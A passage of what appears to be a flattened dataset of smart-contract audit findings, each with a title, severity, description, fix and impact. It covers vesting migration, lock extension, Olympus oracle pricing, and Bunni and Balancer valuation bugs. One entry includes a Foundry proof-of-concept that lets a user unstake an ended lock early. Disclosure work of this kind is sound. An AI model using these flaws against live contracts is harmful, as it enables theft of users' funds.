(userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = 
claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n -When migrating the owner users will lose their rewardsчmediumчWhen a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. 
In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.чWhen migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.чThe user's rewards are lostч```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n -Ended locks can be extendedчmediumчWhen a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time.\"\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. 
By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that check whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\nчDo not allow extension of locks that have already ended.чThe owner of the lock will obtain points that he can unlock anytime. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker having a \"lock\" that can be unstaked anytime will be unfair for the other lockers. 
Considering this, I'll label this as high.ч```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n -OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.чhighчThe moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. 
However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? 
new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle 
feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.чWhen updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? 
new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. 
In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.чNow the moving average prices are used recursively for the calculation of the moving average price. Then, the moving average prices become more smoothed than the intention of the administrator. That is, even when the actual price fluctuations are large, the price fluctuations of `_getCurrentPrice` function will become too small.\\nMoreover, even though all of the oracle price feeds fails, the moving averge prices will be calculated only by moving average prices.\\nThus the current prices will become incorrect. If `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.ч```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n -Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other user's reservesчhighчProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function 
getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\nчGuard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocolчIncorrect assumption of the protocol owned liquidity and hence the supply. 
An attacker can inflate the liquidity reserves. The wider system relies on the supply calculation to be correct in order to perform actions of economic impactч```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n -Incorrect StablePool BPT price calculationчhighчIncorrect StablePool BPT price calculation as rates are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * 
pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. 
Calculates the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of wstETH-WETH pool.\\nExample\\nAt block 18821323: cbeth : 2317.48812 wstEth : 2526.84 pool total supply : 0.273259897168240633 getRate() : 1.022627523581711856 wstRateprovider rate : 1.150725009180224306 cbEthRateProvider rate : 1.058783029570983377 wstEth balance : 0.133842314907166538 cbeth balance : 0.119822100236557012 tvl : (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\naccording to current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086 calculated tvl = bpt price * total supply = 647.606045776\\ncorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132 rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942 bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915 calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693чFor pools having rate providers, divide prices by rate before choosing the minimumчIncorrect calculation of bpt price. 
Has possibility to be over and under valued.ч```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. 
This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n -Inconsistency in BunniToken Price CalculationчmediumчThe deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n 
twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n 
BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = _getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within deviation check process, meaning the check could pass in certain conditions whereas it could have not pass if fees where not accounted on the deviation check. Moreover the below formula used :\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bullet proof as there are discrepancy on what is mesured. 
Taken into the fact that the process to check deviation is not that good plus the fact that methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunnySupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere returned value does not account for uncollected fees whereas deviation check was accounting for itчAlign the methodology used in both the deviation check and the final price computation. 
This could involve either including the uncollected fees in both calculations or excluding them in both.\\nIt's ok for BunniSupply as there are 2 functions handling both reserves and reserves+fees but change deviation check process on the second one to include only reserves when checking deviation twap ratioч`_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol have both ratio computation that includes uncollected fees to compare with TWAP ratio, potentially overestimating the total value compared to what these functions are aim to, which is returning only the reserves or LP Prices by only taking into account the reserves of the pool. Meaning the check could pass in certain conditions where fees are included in the ratio computation and the deviation check process whereas the deviation check should not have pass without the fees accounted.ч```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and 
return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n -Price can be miscalculated.чmediumчIn `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not 
